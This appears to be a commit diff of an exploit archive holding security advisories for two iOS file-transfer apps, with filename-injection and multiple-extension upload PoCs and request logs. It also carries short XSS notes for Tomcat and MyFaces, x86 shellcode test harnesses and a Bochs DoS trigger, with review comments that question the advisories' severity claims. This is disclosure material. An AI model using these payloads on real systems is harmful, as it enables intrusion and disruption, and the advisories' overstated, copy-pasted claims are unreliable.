attachments, photos, contacts, calendars, clipboard items, convert to PDF and much more - to ANY PRINTER!
(Copy of the Homepage: https://itunes.apple.com/en/app/print-n-share-der-all-in-one/id301656026
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the Print n Share v5.5 mobile application for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
EuroSmartz Ltd
Product: Print n Share 5.5
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the import file module in the filename value. Remote attackers can inject own files or
path requests by adding regular text files (add). It is also possible to use the `rename` or `import` function to inject. The file include and
path request execute occurs in the main file dir index or subcategory listing of the mobile application. The security risk of the local file
include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.4(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Inputs(s):
[+] Neue Text Datei (New Text File)
[+] Umbenennen File (Rename File)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the import file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 7.8(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] File Import
Vulnerable Inputs(s):
[+] Importieren - File > Sync
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] File Path Listing (http://localhost:8080)
1.3
A persistent input validation web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The (persistent) vulnerability allows remote attacker to inject own malicious script code on the application-side of the mobile application.
The persistent input validation vulnerability is located in the Ordername (foldername) value of the print n share mobile web-application.
The exploitation can be done by usage of the local standard iOS pictures or video (default) app. Attackers rename the local device photo
or video foldername.The persistent execute occurs in the listed folder of the web-server interface (http://localhost:8080). Remote attackers
can also change the foldername by usage of the application to exploit (inject) via POST method own script code with persistent attack vector.
The vulnerable input are the `Ordername`(folder name), `Neuer Order` (new folder) and `Order Umbenennen` (folder rename). The security risk
of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Exploitation of the persistent input validation web vulnerability requires no privileged mobile application user account but low or medium
user interaction. Successful exploitation of the persistent vulnerability results in persistent session hijacking (customers) attacks, account
steal via persistent web attacks, persistent phishing or persistent manipulation of vulnerable module context.
Request Method(s):
[+] [POST]
Vulnerable Input(s):
[+] Ordnername - (Foldername)
[+] Neuer Ordner - (New Folder)
[+] Ordner Umbenennen - (Rename Folder)
Vulnerable Parameter(s):
[+] foldername - (path)
Affected Module(s):
[+] File Dir List
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php
PoC Source: Local File Include Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">X>"<<>"</[LOCAL FILE INCLUDE WEB VULNERABILITY!]">.php</a>
<br><a href="/[LOCAL FILE INCLUDE WEB VULNERABILITY!]">[LOCAL FILE INCLUDE WEB VULNERABILITY!].txt</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without user interaction and also without privileged
web-application user account. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/[file to path]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg
PoC Source: Arbitrary File Upload Vulnerability - Filename
<html><head>
<title>/</title>
<meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
</head>
<body>
<h2>?/</h2><br><a href="/Clip-Archiv/">Clip-Archiv/</a>
<br>X<a href="/[file]">X>"<<>"</[ARBITRARY FILE UPLOAD WEB VULNERABILITY!]">.jpg.gif..html.js.php.gif.jpg</a>
<br><a href="/[file]">[ARBITRARY FILE UPLOAD WEB VULNERABILITY!].jpg.gif..html.js.php.gif.jpg</a>
</body>
<html>
</iframe></a></body></html>
Reference(s):
http://localhost:8080/
1.3
The persistent input validation vulnerability can be exploited by remote attackers without privileged web-application user account
and with low user interaction. For security demonstration or to reproduce the vulnerability follow the steps and information below.
PoC:
http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">
PoC Source: Persistent Input Validation Vulnerability - Ordnername (Foldername)
<body>
<h2>?/</h2><br><a href="http://localhost:8080/Clip-Archiv/">Clip-Archiv/</a>
<br><a href="http://localhost:8080/%3E%22%3C%3C%3E%22%3C[PERSISTENT INJECTED SCRIPT CODE!]%3E/">>"
<<>"<[PERSISTENT INJECTED SCRIPT CODE!]">/</a>
<br><a href="/Schnellstart.txt">Schnellstart.txt</a>
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure encode and parse of the filename and the connected path value.
1.2
to fix the arbitrary file upload vulnerability it is required to restrict with a filter mechanism the filename extensions.
Disallow multiple extensions and setup and own exception-handling to prevent arbitrary file uploads and restricted file upload bypass.
1.3
To patch the persistent input validation web vulnerability parse and encode the `Ordername` (foldername) input values
in the import, add and rename function.
Filter and encode also the vulnerable output section of the malicious injected test values.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.4(+).
1.2
The security risk of the arbitrary file upload and upload restriction bypass vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.8(+).
1.3
The security risk of the persistent input validation web vulnerability is estimated as medium(+) with a cvss (common vulnerability scoring system) count of 4.5(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
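Review bot: the "local file include" classification in 1.1 is not supported by the PoC shown. The block under "PoC Source: Local File Include Vulnerability - Filename" only shows the crafted filename reflected unencoded into the href and text of an anchor in the directory index (the stray `">` and `<` break out of the tag); no server-side include, path traversal or execution of the stored file is demonstrated, so what the evidence shows is the same HTML/script injection via a name value as 1.3. Likewise, 1.2's "web-shell" and "elevated access rights" claims require the app's embedded web server to execute .php or .js files, and the PoC only shows the renamed file being listed; the 8.4 and 7.8 scores, the 9.2 overall and the "Critical" severity all rest on these unsupported assumptions and should be revisited. Two smaller points: the Release Date (2013-12-06) precedes the Public Disclosure entry (2013-12-01) in the timeline, and the Solution for 1.3 writes "Ordername" where the input list and the rest of the section use "Ordnername".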

@ -0,0 +1,347 @@
Document Title:
===============
Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1166
Release Date:
=============
2013-12-10
Vulnerability Laboratory ID (VL-ID):
====================================
1166
Common Vulnerability Scoring System:
====================================
8.8
Product & Service Introduction:
===============================
Download the photos & videos from your iPhones Library to computer / PC;Upload photos & videos from your computer;
Transfer photos in full resolution in *.png, *.jpg, *.zip formats;No limit of the number, size or quality of the
transferred photos;Photo Video Album Transfer is a multifunctional and easy-to-use app. It allows to transfer
photos and videos from iPhone to iPhone, from iPhone to computer and reverse. Now you can easily manage your
photo or video transfer and forget about cables, additional hardware and expensive programs. Transfer any number
of photos and videos using this irreplaceable application for iPhone.
(Copy of the Homepage: https://itunes.apple.com/en/app/photo-video-album-transfer/id682294794 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
Vulnerability Disclosure Timeline:
==================================
2013-12-09: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Apple AppStore
Product: Photo Video Album Transfer - Mobile Application (Igor Ciobanu) 1.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
1.1
A local file/path include web vulnerability has been discovered in the official Photo Video Album Transfer v1.0 mobile app for apple iOS.
The file include vulnerability allows remote attackers to include (upload) local file or path requests to compromise the application or service.
The remote file include web vulnerability is located in the vulnerable filename value of the iOS Transfer Utility (web interface) module.
Remote attackers can manipulate the filename value in the POST method request of the browse file upload form to cpmpromise the mobile app.
Remote attackers are able to include own local files by usage of the browse file upload module. The attack vecotor is persistent and the
request method is POST. The file include execute occcurs in the main file dir index list were the filenames are visible listed. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 8.8(+).
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password.
Successful exploitation of the vulnerability results in unauthorized local file uploads and path requests to compromise the device or mobile app.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Print n Share v5.5 mobile application for apple iOS.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the upload file module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is
estimated as high with a cvss (common vulnerability scoring system) count of 6.7(+).
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Browse File Upload - File send & arrival (web interface)
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability in the file name can be exploited by remote attackers without user interaction or privileged mobile
web-application user account. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
Module: Upload
Input: Browse File
Method: POST
Manual stepst to reproduce the vulnerability ...
1. Install and start the vulnerable mobile application
2. Open the web-server wifi transfer (localhost:8080)
Note: Start to tamper the browser (http) request and response session of the next POST Request
3. Click the browse file to upload button and choose a random file of your local hd
4. Change in the POST method request of the upload the filename value and inject your own webshell, remote- or local file
5. The execute after the inject occurs in the main index file dir listing of the iOS Transfer Utility
6. Successful reproduce of the remote vulnerability!
PoC: Index File Dir List - iOS Transfer Utulity (filename)
<input name="file[]" accept="image/jpeg, image/png, video/quicktime, video/x-msvideo, video/x-m4v,
video/mp4" multiple="" type="file"></label><label><input name="button" id="button" value="Submit" type="submit"></label></form><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br></td></tr>
<tr><td> <%20../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]"></td><td> 0.1 Kb</td><td>08.12.2013 15:58</td></tr>
<tr style='height: 180px;'><td style="text-align: center;" > <a href="IMG_0556_th.png"><img src="IMG_0556_th.png"
height="110px" style="max-width: 110px"><br>IMG_0556_th.png</a><br> 2.9 Kb</td>
</table>
<input type="hidden" value="numberOfAvailableFiles=IMG_0556_th.png,endOFF"/><br>
</div>
</body></html></iframe></td></tr></tbody></table></div></body></html>
--- PoC Session Request Logs ---
Status: 200[OK]
POST http://192.168.2.106:8080/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[59002] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Post Data:
POST_DATA[-----------------------------1863134445217
Content-Disposition: form-data; name="file[]"; filename="<../[FILE INCLUDE VULNERABILITY VIA VULNERABLE FILENAME!]>"
Content-Type: image/png

Status: 200 OK
GET http://192.168.2.106:8080/a Load Flags[LOAD_DOCUMENT_URI ]
Content Size[0] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Response Headers:
Accept-Ranges[bytes]
Content-Length[0]
Date[So., 08 Dez. 2013 14:58:35 GMT]
1.2
The arbitrary file upload and restricted upload bypass vulnerability can be exploited by remote attackers without privileged web-application
user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided steps and information below.
PoC:
<body><div class="header" id="header">
</div>
<div class="container" id="container"><br>
<table style="margin:0px;" border="0" cellspacing="0" width="100%">
<tbody><tr style="height: 30px; background-color: #CBCABE;">
</tr><tr><td colspan="3"> <a href=".."><b> Refresh</b></a><br><br>
</td></tr><tr style="height: 180px;">
<td style="text-align: center;"> <a href="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]">
<img src="file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]>"
style="max-width: 110px" height="110px"><br><iframe src="a"></a><br> 0.1 Kb</td>
<td style="text-align: center;" > <a href="IMG_0441.MOV"><img src="IMG_0441_th.png" height="110px" style="max-width: 110px">
<br>IMG_0441.MOV</a><br>657665.1 Kb</td>
</table>
--- PoC Session Logs ---
Status: 200[OK]
GET http://192.168.2.106:8080/
Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
Content Size[58702] Mime Type[application/x-unknown-content-type]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Accept-Ranges[bytes]
Content-Length[58702]
Date[So., 08 Dez. 2013 15:34:33 GMT]
16:30:12.476[313ms][total 313ms]
Status: 200[OK]
GET http://192.168.2.106:8080/file.jpg.gif.js.html.php.gif.jpg[ARBITRARY FILE UPLOAD & RESTRICTED UPLOAD BYPASS VULNERABILITY!]
Load Flags[VALIDATE_ALWAYS ]
Content Size[124] Mime Type[:image/jpeg]
Request Headers:
Host[192.168.2.106:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Referer[http://192.168.2.106:8080/]
Cookie[com.sharkfood.airGallery.thumbSize=140; com.sharkfood.airGallery.settings.slideTime=5;
com.sharkfood.airGallery.settings.shuffle=false; com.sharkfood.airGallery.settings.repeat=true]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Headers:
Content-Disposition[:attachment; filename="file.jpg.gif.js.html.php.gif.jpg"]
Content-Length[124]
Accept-Ranges[bytes]
Content-Type[:image/jpeg]
Date[So., 08 Dez. 2013 15:34:33 GMT]
Reference(s):
http://localhost:8080/
Solution - Fix & Patch:
=======================
1.1
The file include web vulnerability can be patched by a secure filter mechanism and exception-handlign to prevent code execution via
filename value.
1.2
Restrict and filter the filename input value in the upload POST method request to ensure the right format is attached.
Restrict the image file access right to view only ;)
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability is estimated as critical because of the location in the main filename value.
1.2
The security risk of the arbitrary file upload web vulnerability and restricted upload bypass bug is estimated high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
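Review bot: section 1.2 opens with "Print n Share v5.5 mobile application", a copy-paste leftover from the previous advisory; this file is about Photo Video Album Transfer v1.0. More importantly, the second session log contradicts the web-shell claim in that section: the GET for file.jpg.gif.js.html.php.gif.jpg comes back with Content-Type image/jpeg and Content-Disposition attachment, i.e. the server hands the bytes back as a download and executes nothing, so the multiple-extension bypass has no demonstrated impact beyond storing an oddly named file. What the listing source does show is stored HTML injection through the multipart filename (the `<iframe src="a">` rendered into the table cell and the follow-up GET /a in the first log), so both 1.1 and 1.2 are the same filename-injection issue and the "critical" rating should be brought in line with that. Also, the Cookie header in every request carries com.sharkfood.airGallery.* values, which appear to belong to a different app previously served on the same host:port; they should be scrubbed from the logs so readers do not attribute them to this product.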

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24476/info
Apache Tomcat is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/jsp-examples/snp/snoop.jsp;[xss]
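Review bot: `http:/;www.example.com` is a mangled URL; the scheme should be `http://`. Keep the `;` before `[xss]`: it introduces a URL path parameter, and the request details (request URI, path info) that the snoop.jsp example page prints back are where the unencoded payload lands.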

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24480/info
Apache Tomahawk MyFaces JSF Framework is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting this vulnerability may allow an attacker to launch cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
http:/;www.example.com/some_app.jsf?autoscroll=[javascript]
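Review bot: same mangled scheme as the previous file, `http:/;www.example.com` should be `http://www.example.com`; the injection point is the autoscroll query parameter as the text says. The product is usually referred to as Apache MyFaces Tomahawk rather than "Apache Tomahawk MyFaces JSF Framework".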

@ -1,18 +1,18 @@
/*
* (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
* - izik <izik@tty64.org>
*/
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
/*
* (linux/x86) normal exit w/ random (so to speak) return value - 5 bytes
* - izik <izik@tty64.org>
*/
char shellcode[] =
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\xcd\x80"; // int $0x80
int main(int argc, char **argv) {
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int) shellcode;
}
// milw0rm.com [2006-01-21]
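Review bot: the two copies of the source in this hunk are identical as rendered, so the change is line-ending or trailing-whitespace normalisation only; nothing functional to review. For anyone rebuilding the file: `ret = (int *)&ret + 2` overwrites main's saved return address on the assumption of a classic 32-bit frame layout, which stack protectors break and which needs the `shellcode[]` bytes in .data to be executable, so build with `-m32 -fno-stack-protector -z execstack` or copy the bytes into a mapping with PROT_EXEC. The "random" exit status in the title comes from `int $0x80` with eax=1 (exit) and ebx never set.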

@ -1,37 +1,37 @@
/* writehello-core.c by Charles Stevenson <core@bokeoa.com>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ecx,%ecx
"\xf7\xe3" // mul %ecx
"\x53" // push %ecx
"\x68\x72\x65\x21\x0a" // push $0xa216572
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548
"\xb2\x0c" // mov $0xc,%dl
"\x43" // inc %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
/* writehello-core.c by Charles Stevenson <core@bokeoa.com>
*
* I made this as a chunk you can paste in to make modular remote
* exploits. I use it to see if my dup2_loop worked. If you don't
* get "Hello core!\n" back it's a good indicator your shell won't
* be functional the way you'd like.
*/
char hellcode[] = /* write(0,"Hello core!\n",12); linux/x86 by core */
"\x31\xdb" // xor %ecx,%ecx
"\xf7\xe3" // mul %ecx
"\x53" // push %ecx
"\x68\x72\x65\x21\x0a" // push $0xa216572
"\x68\x6f\x20\x63\x6f" // push $0x6f63206f
"\x68\x48\x65\x6c\x6c" // push $0x6c6c6548
"\xb2\x0c" // mov $0xc,%dl
"\x43" // inc %ebx
"\x89\xe1" // mov %esp,%ecx
"\xb0\x04" // mov $0x4,%al
"\xcd\x80" // int $0x80
// not needed.. makes it exit cleanly
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0" // xor %eax,%eax
"\x40" // inc %eax
"\x89\xc3" // mov %eax,%ebx
"\xcd\x80" // int $0x80
;
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte (w/optional 7 byte exit) write(0,\"Hello core!\\n\",12); linux/x86 by core\n",
strlen(hellcode));
shell();
return 0;
}
// milw0rm.com [2005-11-09]

platforms/linux/dos/30110.c Executable file (23 lines)
@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/24246/info
Bochs is prone to a heap-based buffer-overflow issue and a denial-of-service issue. The buffer-overflow issue occurs because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized memory buffer. The denial-of-service vulnerability is caused by a divide-by-zero operation.
A local attacker can exploit these issues to execute arbitrary code in the context of the affected application or to cause denial-of-service conditions. Failed exploit attempts of the buffer-overflow vulnerability will also result in denial-of-service conditions.
#include <sys/io.h>
int main(int argc, char **argv) {
iopl(3);
outw(0x5292, 0x24c);
outw(0xffff, 0x245);(a)
outw(0x1ffb, 0x24e);
outb(0x76, 0x241);
outb(0x7b, 0x240);
outw(0x79c4, 0x247);
outw(0x59e6, 0x240);
return 0;
}
(a) <- TXCNT is inserted here.
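Review bot: as committed, 30110.c does not compile: the `source:` line and the two description paragraphs sit above `#include <sys/io.h>` outside any comment, the `(a)` marker appended to `outw(0xffff, 0x245);(a)` is prose inside a statement, and the footnote `(a) <- TXCNT is inserted here.` follows the closing brace. Suggest moving the description and the TXCNT remark into a `/* ... */` block and leaving the `outw` line clean. The program also ignores the return value of `iopl(3)`, which fails without CAP_SYS_RAWIO, so an unprivileged run proceeds straight to port writes that fault with SIGSEGV; checking it and calling `perror("iopl")` would make the PoC's precondition explicit.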

@ -77,6 +77,6 @@ close(s);
free(cmsg);
}
return 42;
}
// milw0rm.com [2004-12-16]
}
// milw0rm.com [2004-12-16]
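Review bot: the removed and added lines are the same text (`}` and the milw0rm marker on both sides), so this hunk, like the following milw0rm-marker hunks, is a line-ending or trailing-newline normalization with no code change; stating that in the commit message would let reviewers skip them with confidence.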

@ -74,6 +74,6 @@
$buffer2 .= $fmtstring;
exec("$cdrecordpath dev='$buffer2' '$cdrecordpath'");
# milw0rm.com [2003-05-14]
# milw0rm.com [2003-05-14]

@ -323,6 +323,6 @@ int main(int argc, char *argv[]) {
}
// milw0rm.com [2004-08-13]
// milw0rm.com [2004-08-13]

@ -155,6 +155,6 @@ int cookthis() {
}
// milw0rm.com [2003-09-09]
// milw0rm.com [2003-09-09]

@ -299,6 +299,6 @@ fclose(logfile);
}
}
/* m00 */
// milw0rm.com [2003-12-06]
/* m00 */
// milw0rm.com [2003-12-06]

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/24291/info
GDB is prone to a buffer-overflow vulnerability because it fails to properly check bounds when handling specially crafted executable files.
Attackers could leverage this issue to run arbitrary code outside of a restricted environment, which may lead to privilege escalation. Symantec has not confirmed code execution.
http://www.exploit-db.com/sploits/30142.zip
